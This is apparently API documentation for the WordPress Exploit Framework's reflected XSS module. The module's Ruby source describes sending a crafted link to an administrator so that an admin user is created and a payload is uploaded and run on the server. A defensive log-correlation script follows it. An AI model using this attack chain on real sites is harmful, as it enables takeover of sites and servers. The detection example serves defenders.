Module: Wpxf::WordPress::ReflectedXss
Overview
Provides reusable functionality for reflected XSS modules.
Instance Method Summary
- #initialize ⇒ Object: Initialize a new instance of ReflectedXss.
- #run ⇒ Boolean: Run the module.
Methods included from Xss
#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script
Methods included from Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server
Instance Method Details
#initialize ⇒ Object
Initialize a new instance of Wpxf::WordPress::ReflectedXss.
    # File 'lib/wpxf/wordpress/reflected_xss.rb', line 8
    def initialize
      super
      @success = false

      _update_info_without_validation(
        desc: %(
          This module prepares a payload and link that can be sent
          to an admin user which when visited with a valid session will create
          a new admin user which will be used to upload and execute the selected payload
          in the context of the web server.
        )
      )
    end
#run ⇒ Boolean
Run the module.
    # File 'lib/wpxf/wordpress/reflected_xss.rb', line 24
    def run
      # Including modules must define url_with_xss, the link printed below.
      unless respond_to? 'url_with_xss'
        raise 'Required method "url_with_xss" has not been implemented'
      end

      return false unless super
      # Auxiliary modules return before the URL is printed and the HTTP server is started.
      return true if aux_module?

      emit_info 'Provide the URL below to the victim to begin the payload upload'
      puts
      puts url_with_xss
      puts

      start_http_server
      @success
    end
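The module description in #initialize implies a sequence a defender can look for in web server logs: an administrator account is created and, shortly afterwards, a plugin is uploaded. The following is an added detection example, not part of WPXF or of this page. It assumes combined-format access logs, the stock WordPress admin endpoints /wp-admin/user-new.php and /wp-admin/update.php?action=upload-plugin, and a 300-second correlation window; the function names and sample log lines are constructed for illustration.

```ruby
require 'time'

# Constructed sample lines in combined log format (not from a real site).
SAMPLE_LOG = <<~LOG
  203.0.113.10 - - [12/Mar/2024:10:15:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 5120
  203.0.113.10 - - [12/Mar/2024:10:15:04 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0
  198.51.100.7 - - [12/Mar/2024:10:15:06 +0000] "POST /wp-login.php HTTP/1.1" 302 0
  198.51.100.7 - - [12/Mar/2024:10:15:09 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 2048
  203.0.113.10 - - [12/Mar/2024:14:40:00 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 2048
LOG

LINE_RE = %r{\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})}
WINDOW_SECONDS = 300 # assumed correlation window; tune per site

# Parse one access-log line into a hash, or nil when it does not match.
def parse_line(line)
  m = LINE_RE.match(line) or return nil
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: m[4], status: m[5].to_i }
end

# Return one finding per plugin upload that follows a user creation
# within the window. different_client marks pairs seen from two addresses.
def find_user_then_plugin_upload(log_text, window = WINDOW_SECONDS)
  events = log_text.each_line.map { |l| parse_line(l.strip) }.compact
                   .select { |e| e[:method] == 'POST' }
                   .sort_by { |e| e[:time] }
  creations = events.select { |e| e[:path].start_with?('/wp-admin/user-new.php') }
  uploads = events.select do |e|
    e[:path].start_with?('/wp-admin/update.php') && e[:path].include?('action=upload-plugin')
  end
  uploads.flat_map do |up|
    creations.select { |c| (0..window).cover?(up[:time] - c[:time]) }.map do |c|
      { created_at: c[:time], created_from: c[:ip], uploaded_from: up[:ip],
        gap_seconds: (up[:time] - c[:time]).to_i,
        different_client: c[:ip] != up[:ip] }
    end
  end
end

find_user_then_plugin_upload(SAMPLE_LOG).each { |f| puts f }
```

A finding is a lead for review rather than proof of compromise, since administrators legitimately create users and install plugins; the later upload in the sample falls outside the window and is not reported.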